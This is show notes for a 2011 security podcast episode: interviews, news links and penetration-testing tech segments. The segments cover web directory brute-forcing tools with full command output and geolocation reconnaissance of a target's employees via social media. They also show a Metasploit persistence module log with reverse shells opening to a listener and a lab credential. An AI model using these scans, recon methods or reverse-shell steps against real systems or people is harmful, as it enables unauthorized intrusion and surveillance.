- 1 Announcements & Shameless Plugs
- 2 Kick off with Johnny Long
- 3 Marcus Ranum Interview
- 4 The Stogie Geeks Podcast
- 5 Ron Gula Interview
- 6 Tech Segment: Concealing Storage in Windows Volume Shadow Copy Service
- 7 Robert Graham Interview
- 8 Tech Segment: Pushpin Release
- 9 Tech Segment: Busting Directories: Dirbuster and Alternatives
- 10 Kevin Mitnick Interview
- 11 Tech Segment: Anti Review
- 12 HackNaked TV/ PaulDotCom Espanol /Dinner Break
- 13 Tech Segment: Google Hacking Diggity Project
- 14 Ancient alien beings, hypervisors and virtualization
- 15 Tech Segment: New ways to Persist with Metasploit
- 16 Pen Testing War Stories with Kevin Fiscus
- 17 Drunken Security News
Announcements & Shameless Plugs
PaulDotCom Security Weekly - Episode 265 Hackers for Charity Twelve hour podcast for Friday October 28th, 2011.
- Check out Hack Naked TV
- Friday October 28th is our 12 hour podcast for Hackers for Charity - we have a special interview with Johnny Long, Kevin Mitnick and other special guests in the works.
- Larry is teaching SEC580 Metasploit Kung Fu for Enterprise Pen Testing in San Antonio, TX December 4-5. Tell them (and us) that we sent you! Want to go in general? How about 10% off? Use the discount code Larry-SA10
- Don't forget to Read our blog, Participate on our mailing list, Visit PaulDotCom Insider, Follow us on Twitter, Join the IRC channel at irc.freenode.net #pauldotcom, Watch our Videos and Add us on Facebook where we can be "friends"
- BSides, BSides, BSides everywhere
Watch the show live below or at http://securityweekly.com/live August 31, 2012 10AM-6PM EDT
NOTE: The video will play the most recent show up until we are live!
The HFC group:
- Feeds children through a "food for work" program.
- Builds computer labs to help students learn skills and land jobs that are key to disrupting poverty's vicious cycle.
- Provides technical assistance to charities that can't afford IT services.
- Provides job experience and references to the Ugandan volunteers.
You can donate or get more involved via the Hackers for Charity website.
Kick off with Johnny Long
10 AM EDT
Johnny calls in to update us on his Hackers for Charity project.
Marcus Ranum Interview
- Marcus, what's the latest on cyberwar? Has stuxnet changed some of your views on Cyberwar?
- Speaking of SCADA, what can we do to improve the security of SCADA systems? It seems every month there is a new "SCADA hack" and vendors and organizations that aren't paying attention to security.
- Penetration tests are successful, and one of the primary ways in which we are gaining access to systems is through "client-side attacks". Essentially, we are tricking the user into running code, no vulnerabilities or "exploits" required. What can organizations do to protect against this threat?
- Speaking of vulnerabilities, there still seems to be a mindset in the community of "become vulnerable, exploit, apply patch, rinse, repeat". What can we do to shift people away from the "patch mindset" to defensive measures that actually work?
- Speaking of defensive measures, what are your thoughts on "smart firewalls"? Are they still the stop-gap measure that is masking the real problems?
Hosts: Paul Asadoorian & Tim "Bugbear" Mugherini
Noon - 1PM
Paul & Tim will smoke some cigars and tell you all about them, talk about what they's been smoking, and feature a "Stogie How-To" segment titled "The Top Ten Things You Should Not To Do With Your Humidor".
Ron Gula Interview
10 Things You Shouldn’t Do For Cyber-Security Awareness Month - According to the Department of Homeland Security, October 2011 is national CyberSecurity Awareness month. With the best intentions, I’ve laid out ten items that you shouldn’t do in an attempt to raise awareness. I’ve seen these items backfire, cause disruption and raise awareness of how security can make our life less convenient and questionably more secure.
Ron's Top Ten List:
10 – Perform a Client Side Penetration Test
9 – Switch to IPv6
8 – Learn Government Compliance Standards
7 – Read Computer Security Related Books of Fiction and Fact
6 – Engage in a religious debate about the most secure OS, phone or Web Browser
5 – Run a Honeypot
4 – Blame any attacks or viruses outbreaks on China
3 - Publish lists of People’s Cracked Passwords
2 – Patch all of those systems that haven’t been patched in a long while
1 - Turn off your Anti-Virus Product
Tech Segment: Concealing Storage in Windows Volume Shadow Copy Service
Authors: Mark Baggett and Tim "LaNMaSteR53" Tomes
Check out their presentation here
You can download the tool [tools.lanmaster53.com/vssown.vbs here]
Robert Graham Interview
- How did you get your start in information security?
- Tell us about what you learned about Occupy Wall Street
- What is your policy on disclosure and what are the merits to Digital Bond's policy?
- What can Apple do to improve the security of its products?
Tech Segment: Pushpin Release
One of the better aspects of penetration testing is tying together a variety of different attack vectors to make something beautiful and unique. For example, doing some research on a target and tailoring a custom spear-phish attack for them.
However, one of the things we have been working on lately is geo-location tied with social networking. To that end we are releasing pushpin.py. To run pushipn you specify a latitude and longitude and a radius in kilometers. What pushpin provides is all of the tweets, YouTube videos and Flicker pictures from within that radius.
How can this be useful in a test? What you can do is first create a list of users and possible email addresses from a target organization. This can be done either through Maltego, Google hacking, Jigsaw or LinkedIn. Next, take each of the accounts and users that were discovered and see if they have accounts with Twitter, YouTube or Flicker. You would be shocked to discover just how many people associate their work email with their social media. Once you have identified the accounts that are being used, you can next use pushpin to see if they have posted pictures, videos or tweets in the area near their place of employment.
Odds are, they have.
Next, start harvesting in that area and searching the output for your target accounts. This gives you a very good idea of the places they visit, and in some situations, you can even get a few pictures or a video of the inside of the office.
While Ethan did an outstanding job of starting the tool, we currently are looking for some people to help extend the tool and incorporate additional sites and geolocation data. Please see the source code of the tool for more info.
Get it here
BTW, want to get the Latitude and Longitude of an address form Google maps? Try ]http://itouchmap.com/latlong.html this]
Tech Segment: Busting Directories: Dirbuster and Alternatives
Author: Larry Pesce
Ok, we've covered DirBuster before. Depending on options this could take a long time. One advantage with Dirbuster, is a GUI. (Yeah, Girls Use It). Another is the ability to brute force directories and files without a wordlist…and have it take forever.
So what happens if you want to do it form the command line?
Well, we can still use DirBuster from the command line, but it is not documented terribly well. Let's get some better documentation:
java -jar DirBuster-0.12.jar -h Usage: java -jar DirBuster-1.0-RC1 -u <URL http://example.com/> [Options] Options: -h : Display this help message -H : Start DirBuster in headless mode (no gui), report will be auto saved on exit -l <Word list to use> : The Word list to use for the list based brute force. Default: /Users/larry/Desktop/DirBuster-1.0-RC1/directory-list-2.3-small.txt -g : Only use GET requests. Default Not Set -e <File Extention list> : File Extention list eg asp,aspx. Default: php -t <Number of Threads> : Number of connection threads to use. Default: 10 -s <Start point> : Start point of the scan. Default: / -v : Verbose output, Default: Not set -P : Don't Parse html, Default: Not Set -R : Don't be recursive, Default: Not Set -r <location> : File to save report to. Default: /Users/larry/Desktop/DirBuster-1.0-RC1/DirBuster-Report-[hostname]-[port].txt
Ok, so now we can begin to put together some command line options:
java -jar DirBuster-1.0-RC1 -u http://www.somesite.com -H -r output.txt
In this case we have started it with -H for headless operation (don't start the GUI). In order to save some typing, we have also omitted the -l switch (to use the default wordlist). What if we want to brute force filenames as well?
java -jar DirBuster-1.0-RC1 -u http://www.somesite.com -H -r output.txt -e asp,aspx,html,htm
Now there are a few interesting caveats with this. First off, DirBuster is Java, which can be a little heavy. I haven't been able to make it work well/successfully. Sure, It will run anywhere, but it is java. Also, no command line realtime feedback, and seeing soemthing about having to parse XML to do some reporting on. Yuck. How about a different command line option?
It is command line only and has most of the functionality of DirBuster, but without the overhead of java or a GUI. It retains most of the functionality of DirBuster - the only thing I cannot find is the ability to do brute forcing without a wordlist.
It should compile on just about any posix system that has access to libcurl. It installed without issue on my OSX systems and Ubuntu. I believe libcurl were already installed in both cases for other projects.
So, lets see how it works
$ ./dirb http://www.somesite.com ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt ----------------- DIRB v2.03 By The Dark Raver ----------------- START_TIME: Wed Oct 26 10:18:42 2011 URL_BASE: http://www.somesite.com/ WORDLIST_FILES: ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt ----------------- GENERATED WORDS: 4712 ---- Scanning URL: http://www.somesite.com/ ---- + http://www.somesite.com// (FOUND: 200 [Ok] - Size: 29435) + http://www.somesite.com/Admin/ ==> DIRECTORY + http://www.somesite.com/aspnet_client (FOUND: 403 [Forbidden] - Size: 218) + http://www.somesite.com/components/ ==> DIRECTORY + http://www.somesite.com/config/ ==> DIRECTORY + http://www.somesite.com/controls/ …
Pretty simple, eh?
We can also use it to brute force filenames, and we give the extensions we want to test with the -X switch, based on the words in the wordlists specified:
$ ./dirb http://www.somesite.com ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt -X .asp,.aspx,.html,.htm ----------------- DIRB v2.03 By The Dark Raver ----------------- START_TIME: Wed Oct 26 10:25:52 2011 URL_BASE: http://www.somesite.com/ WORDLIST_FILES: ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt EXTENSIONS_LIST: (.asp,.aspx,.html,.htm) | (.asp)(.aspx)(.html)(.htm) [NUM = 4] ----------------- GENERATED WORDS: 4712 ---- Scanning URL: http://www.somesite.com/ ---- --> Testing: http://www.somesite.com/2002.htm …
$ ./dirb http://www.somesite.com ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt -o outfile.txt -S
We need the -S for silent to make the report readable….of course this can be combines with this command as well:
$ ./dirb http://www.somesite.com ./wordlists/big.txt,./wordlists/vulns/sharepoint.txt,./wordlists/vulns/iis.txt -X .asp,.aspx,.html,.htm -o outfile.txt -S
The -S is really needed. Why? If it is not included the log includes EVERY test that was against the host, successful or not. If the -S silent switch is added, it only includes (at the terminal and the log) the successful finds. Oh, and the report is in plain text, great for additional reporting and or post processing with unix text processing.
As far as real time feed back, that happens too, including status codes, and size of the pages returned. That's helpful for knocking out unusual pages from standard responses such as "Directory Listing not allowed" or 30x Moves.
One other helpful switch that I found would be to use the -i switch. Thsi will launch a case insensitive search and can cut down on the amout of requests, especiually when headed to an IIS system or apache on Windows (yeah, windows is case insensitive, unlike posix OSes). One way that I like to determine Webserver type is to use a firefox plugin "Header Spy", which places it on the bottom bar of the browser. This of course does not accutatley identify Apache on Windows all of the time. nor is it completely accurate.
So, lets find another way around that and using command line tools.
Yay nmap, and thanks to Ron Bowes for the http-headers NSE script. Let's fire this off like so:
Hiroshige:~ lpesce$ nmap -sV --script=http-headers -p 80 www.healthcomp.com Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-27 16:44 EDT Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.06 seconds Hiroshige:~ lpesce$ nmap -sV --script=http-headers -p 80 www.somesite.com Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-27 16:46 EDT Nmap scan report for www.somesite.com (184.108.40.206) Host is up (0.067s latency). rDNS record for 220.127.116.11: 208-87-35-101.securehost.com PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.17 ((Ubuntu)) | http-headers: | Date: Thu, 27 Oct 2011 20:46:42 GMT | Server: Apache/2.2.17 (Ubuntu) | X-Powered-By: PHP/5.3.5-1ubuntu7.2 | Set-Cookie: uid=www4ea9c332892637.06471309; expires=Sat, 26-Nov-2011 20:46:42 GMT | Vary: Accept-Encoding | Connection: close | Content-Type: text/html | Set-Cookie: WEB=W3; path=/ | |_ (Request type: HEAD) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.73 seconds
In this case we've got Apache on Ubuntu. No need for the DIRB -i switch here.
$ nmap -sV --script=http-headers -p 80 www.someothersite.org Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-27 16:49 EDT Nmap scan report for www.carene.org (18.104.22.168) Host is up (0.019s latency). rDNS record for 22.214.171.124: www.someothersite.org PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.0 | http-headers: | Content-Type: text/html; charset=UTF-8 | Server: Microsoft-IIS/7.0 | Set-Cookie: CFID=54754419;expires=Sat, 19-Oct-2041 20:49:14 GMT;path=/ | Set-Cookie: CFTOKEN=42783161;expires=Sat, 19-Oct-2041 20:49:14 GMT;path=/ | X-Powered-By: ASP.NET | Date: Thu, 27 Oct 2011 20:49:14 GMT | Connection: close | |_ (Request type: HEAD) Service Info: OS: Windows Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.12 seconds
This one would be a good candidate for the -i swtich.
$ nmap -sV --script=http-headers -p 80 192.168.10.19 Starting Nmap 5.51 ( http://nmap.org ) at 2011-10-27 17:56 EDT Nmap scan report for 192.168.10.19 Host is up (0.0042s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.21 ((Win32)) | http-headers: | Date: Thu, 27 Oct 2011 21:56:31 GMT | Server: Apache/2.2.21 (Win32) | Last-Modified: Sat, 20 Nov 2004 18:16:24 GMT | ETag: "200000001bcee-2c-3e9549efc6e00" | Accept-Ranges: bytes | Content-Length: 44 | Connection: close | Content-Type: text/html | X-Pad: avoid browser bug | |_ (Request type: HEAD) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.60 seconds
As would this one.
Ok, so the only thing that I'm finding to be an issue with DIRB is the lack of ability to do directory discover, then to filename with extension discovery in the new directories. It appears to only be one or the other.
Yes, you can do directory bruteforcing with nikto as well. Did you know that? Neither did I. It does require perl and a list of directories to be scanned. In this case I've used one from DIRB, as nikto does not come with one standard.
While it may not be as configurable, is does perform a bunch of additional tests, that can give a bunch of other interesting information. Let's get it rockin':
First, command line options:
perl ./nikto.pl - Nikto v2.1.4 --------------------------------------------------------------------------- + ERROR: No host specified -config+ Use this config file -Cgidirs+ scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/" -dbcheck check database and other key files for syntax errors -Display+ Turn on/off display outputs -evasion+ ids evasion technique -Format+ save file (-o) format -host+ target host -Help Extended help information -id+ Host authentication to use, format is id:pass or id:pass:realm -list-plugins List all available plugins -mutate+ Guess additional file names -mutate-options+ Provide extra information for mutations -output+ Write output to this file -nocache Disables the URI cache -nossl Disables using SSL -no404 Disables 404 checks -port+ Port to use (default 80) -Plugins+ List of plugins to run (default: ALL) -root+ Prepend root value to all requests, format is /directory -ssl Force ssl mode on port -Single Single request mode -timeout+ Timeout (default 2 seconds) -Tuning+ Scan tuning -update Update databases and plugins from CIRT.net -vhost+ Virtual host (for Host header) -Version Print plugin and database versions + requires a value Note: This is the short help output. Use -H for full help.
Now some usage:
$ perl nikto.pl -mutate 6 -mutate-options small.txt -output outpput.txt -host www.somesite.com - Mutate is deprecated, use -Plugins instead - Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 10.14.171.123 + Target Hostname: www.somesite.com + Target Port: 80 + Using Mutation: Attempt to guess directory names from the supplied dictionary file + Start Time: 2011-10-28 21:27:58 --------------------------------------------------------------------------- + Server: Microsoft-IIS/6.0 + Retrieved x-aspnet-version header: 2.0.50727 + No CGI Directories found (use '-C all' to force check all possible dirs) + ERROR: Unable to open dictionary file : No such file or directory. + robots.txt contains 1 entry which should be manually viewed. + OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://192.168.254.10/images/". + ETag header found on server, fields: 0xa05cd8197221cc1:2902 + Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0 for Win2k, current is at least 7.5) + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST …
Pretty cool eh?
I'd never heard of this one, and at an initial stab, seems to be the least robust of the options but is an option nonetheless. This one requires perl as well.
First a little cmd line love:
perl ./http-dir-enum.pl http-dir-enum v0.4.2 ( http://portcullis-security.com/16.php ) Copyright (C) 2006 Mark Lowe ( firstname.lastname@example.org ) Given a URL and a wordlist, http-dir-enum will attempt to determine names of directories that exist on a website. Usage: http-dir-enum.pl [options] -f dir-file url options are: -m n Maximum number of worker processes (default: 8) -f file File of potential directory names -k file File of known directory names -c 0|1 Close connection between each attempt (default: 0) -r 0|1 Recursively enumerate sub directories (default: 1) -t n Wait a maximum of n seconds for reply (default: 20) -u user Username to use for basic authentication -p pass Password to use for basic authentication -H g|h HTTP method g=GET, h=HEAD (default: head) -i code Ignore HTTP response code (e.g. 404 or '404|200') -U str Set User-Agent header to str (default based on Firefox 126.96.36.199/Linux) -s 0|1 Add a trailing slash to the URL (default: 1) -S 0|1 Case sensitive directory names (default: 1) -a 0|1 Automatically determine HTTP response code to ignore (default: 1) -l n Limit scan to n attempts per second (default: unlimited) -R 0|1 Follow redirects (default: 0) -q Quiet. Don't print out info ("[I]") messages -n n Only read first n lines of dirs file (default: unlimited) -o file Save XML report of dirs found to file (default: don't save a report) -x regx Return only results that match this regular expression -X regx Ignore results that match this regular expression -P url Proxy URL -C str Use cookie -v Verbose -d Debugging output -D code Print out whole response if it has HTTP code "code" (e.g. 500) -h This help message The default options should be suitable most of the time, so the typical usage would be: http-dir-enum.pl -f dirs.txt http://host
Well, 2006 eh? I suppose that not much has really changed, except for maybe needing an updated directory file, which it includes. For me, the bad part? XML output. Well, let's give it a go:
$ perl ./http-dir-enum.pl -o output.xml -f directory-names.txt http://www.healthcomp.com Starting http-dir-enum v0.4.2 ( http://portcullis-security.com/16.php ) Copyright (C) 2006 Mark Lowe ( email@example.com ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- URL .................... http://www.somesite.com Processes .............. 8 Directory name file .... directory-names.txt Query timeout .......... 20 secs HTTP Method ............ HEAD Max Queries / sec ...... unlimited Trailing slash ......... On Recursive dir search ... On Close connections ...... Off Follow redirects ....... Off Case sensistive dirs ... On Auto-ignore ............ On Output file ............ output.xml ######## Scan started on Thu Oct 27 21:49:23 2011 ######### [I] Processing directory: / (0 dirs remaining) [I] Auto-ignoring HTTP code 404 for http://www.somesite.com admin 403 documentation 403 images 403 config 403 aspnet_client 403 …
Well, if it isn't terribly robust, at least it is in perl, and modified by many, and at least yet another option.
That is all I've got, have fun busting directories.
Kevin Mitnick Interview
Tech Segment: Anti Review
Lets take a look at the Anti Android attack tool from zimperium.
HackNaked TV/ PaulDotCom Espanol /Dinner Break
Tech Segment: Google Hacking Diggity Project
Author: with Jack "Tenacious" D.aniel
Ancient alien beings, hypervisors and virtualization
Your host for this journey will be none other than Eric Fitterman!
"Researchers in Central America recently discovered an ancient underground lake containing many new discoveries about the Mayan civilization. Among these discoveries were many mysterious glyphs depicting what appear to be other-worldy beings handing compact disks to Mayan priests. Excavation unearthed some ancient, but usable, compact disks, containing what appeared to be bootable Linux environments designed to reset passwords in VMware's ESX hypervisor. Eric Fiterman, of Rogue Networks, has extensively studied the artifacts from the project, and has learned that ancient alien beings may have given humans knowledge of hypervisors and virtualization long ago.
Eric believes that virtualization and computing were ancient technologies used by the Mayans, and that among this lost knowledge were the secrets of how to recover VMware hypervisor systems without a password. Eric will be discussing this recently discovered artifact, and is releasing a bootable ISO that allows users to restore ESX systems without re-installing the hypervisor."
Tech Segment: New ways to Persist with Metasploit
Author: Carlos "DarkOperator" Perez
Recently at Derbycon I saw Egypt doing a demo for several of the students of his class where he was covering that once you get a shell on a system that one of the first actions to take is to make sure you have a secondary one since breaking a shell is quite easily, I do have to say I agree specially when one is going to interact with one. I saw him demo my multi_meter_inject script that I wrote with the initial purpose sending a x86 Meterpreter session to a colleague or group of colleagues by injecting the Meterpreter x86 payload in to a process memory and executing it. After seeing him fighting a bit on x64 systems since the script/post module was designed for x86 systems and only Meterpreter the limitations where showing, so on the flight back to PR I wrote a new version with several checks and controls and expanded to work with not only Meterpreter but other Windows Payloads and added support and checks for x64 systems. This module is called payload_inject, the experience from this module was used for the port of the persistence script in to post module so you can place a Meterpreter payload in a persistent manner, now to the limitation that the payload needed to be converted in to a vbs script to give it the persistent qualities used by the script this one is limited to the x86 version of Meterpreter but extended it to check for existent listeners and to provide more options specially for payloads like the new Meterpreter HTTP and HTTPS versions. I also wrote a module for Unix and Linux system using the scripting environment that can be installed on the system to create a one-liner reverse TCP shell using the code I saw on a link that was tweeted by Chris John Riley on the [PentestMonkey http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet] website so that nothing is actually written to disk and the session resides in memory.
We will start with some demo sessions where session 1 is for a FreeBSD 8.2 VM, sessions 2 to a Windows 7 machine in a domain, session 3 and session 4 is for a Linux Ubuntu System.
sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell bsd SSH admin:Newsystem01 (192.168.1.134:22) 192.168.1.241:55187 -> 192.168.1.134:22 2 meterpreter x86/win32 VICTIMLAB\administrator @ WIN701 192.168.1.100:4444 -> 192.168.1.138:23021 3 meterpreter x86/win32 VICTIMLAB\Administrator @ WIN2K3LAB01 192.168.1.100:4444 -> 192.168.1.138:4340 4 shell linux 192.168.1.100:4448 -> 192.168.1.135:37211
Lets start with the most recent one that is the system_session module that uses the scripting environments that are present on a box. The environment supported are:
Lets start by selecting the module and looking at the options
msf auxiliary(ssh_login) > use post/multi/manage/system_session msf post(system_session) > show options Module options (post/multi/manage/system_session): Name Current Setting Required Description ---- --------------- -------- ----------- HANDLER false yes Start an Exploit Multi Handler to receive the connection LHOST yes IP of host that will receive the connection from the payload. LPORT 4433 no Port for Payload to connect to. SESSION yes The session to run this module on. TYPE auto yes Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)
Lets start with the case of letting the module select the first supported scripting environment and set a remote session
msf post(system_session) > set SESSION 1 SESSION => 1 msf post(system_session) > set LHOST 192.168.1.100 LHOST => 192.168.1.100 msf post(system_session) > set HANDLER true HANDLER => true msf post(system_session) > run [*] Starting exploit multi handler [*] Started reverse handler on 192.168.1.100:4433 [*] Starting the payload handler... [*] Python was found on target [*] Python reverse shell selected [*] Executing reverse tcp shel to 192.168.1.100 on port 4433 [*] Post module execution completed msf post(system_session) > [*] Command shell session 5 opened (192.168.1.100:4433 -> 192.168.1.134:60732) at 2011-10-28 15:03:39 -0400 msf post(system_session) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell bsd SSH admin:Newsystem01 (192.168.1.134:22) 192.168.1.241:55187 -> 192.168.1.134:22 2 meterpreter x86/win32 VICTIMLAB\administrator @ WIN701 192.168.1.100:4444 -> 192.168.1.138:23021 3 meterpreter x86/win32 VICTIMLAB\Administrator @ WIN2K3LAB01 192.168.1.100:4444 -> 192.168.1.138:4340 4 shell linux 192.168.1.100:4448 -> 192.168.1.135:37211 5 shell bsd 192.168.1.100:4433 -> 192.168.1.134:60732 msf post(system_session) > msf post(system_session) > set SESSION 4 SESSION => 4 msf post(system_session) > set TYPE bash TYPE => bash msf post(system_session) > run [*] Starting exploit multi handler [-] Job 5 is listening on IP 192.168.1.100 and port 4433 [-] Could not start handler! [-] A job is listening on the same Port [*] Bash reverse shell selected [*] Executing reverse tcp shel to 192.168.1.100 on port 4433 [*] Post module execution completed msf post(system_session) > [*] Command shell session 6 opened (192.168.1.100:4433 -> 192.168.1.135:45662) at 2011-10-28 15:08:13 -0400 msf post(system_session) > sessions -i 6 [*] Starting interaction with 6... bash: no job control in this shell To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. carlos@infidel02-dev:/home/carlos/Desktop$ uname -a uname -a Linux infidel02-dev 2.6.32-25-generic #45-Ubuntu SMP Sat Oct 16 19:48:22 UTC 2010 i686 GNU/Linux carlos@infidel02-dev:/home/carlos/Desktop$ ^Z Background session 6? [y/N] y
Pen Testing War Stories with Kevin Fiscus
Drunken Security News
(This segment can go anywhere during the 12 hours, it should last an hour)
- Why You Still Can’t Teach a Machine to Hack
- Pentesting iPhone Applications « SECURITYLEARN
- Security Onion: When is full packet capture NOT full packet capture?
- IBM Rational Application Security Insider: DNS poisoning via Port Exhaustion
- iPhone hacked into spiPhone to eavesdrop and track what you type on nearby PC - Computerworld Blogs
- 3 Words to Describe Enterprise Security
- Is a separate highly secure Internet needed?
- HowTo: vCenter alarm for root login
- Nightmare on Malware Street
- Windows XP becomes zombie tween - Computerworld Blogs
AWS almost pwnage - [Larry] - apparently due to some faulty crypto, attackers could have executed administrative tasks on any infrastructure. The basis for the attack was discovered in 2005, before AWS was even a glimmer.
Squid proxy vulns - [Larry] - I keep waiting for things like this, as I know of a bunch of things that use squid proxy that would be loads of fun to pwn. I won;t mention it, as it is an ongoing project for me, nor do I know if the information I have is still current. This may be one that reverst to the P in APT.
THC pwns SSL - [Larry] - Want to DOS an SSL enabled website? This tool will let you do that, using the built in itels for SSL re-negotiation. This feature was intended to keep things more secure, but can be used to do bad things as well.
10PM show over.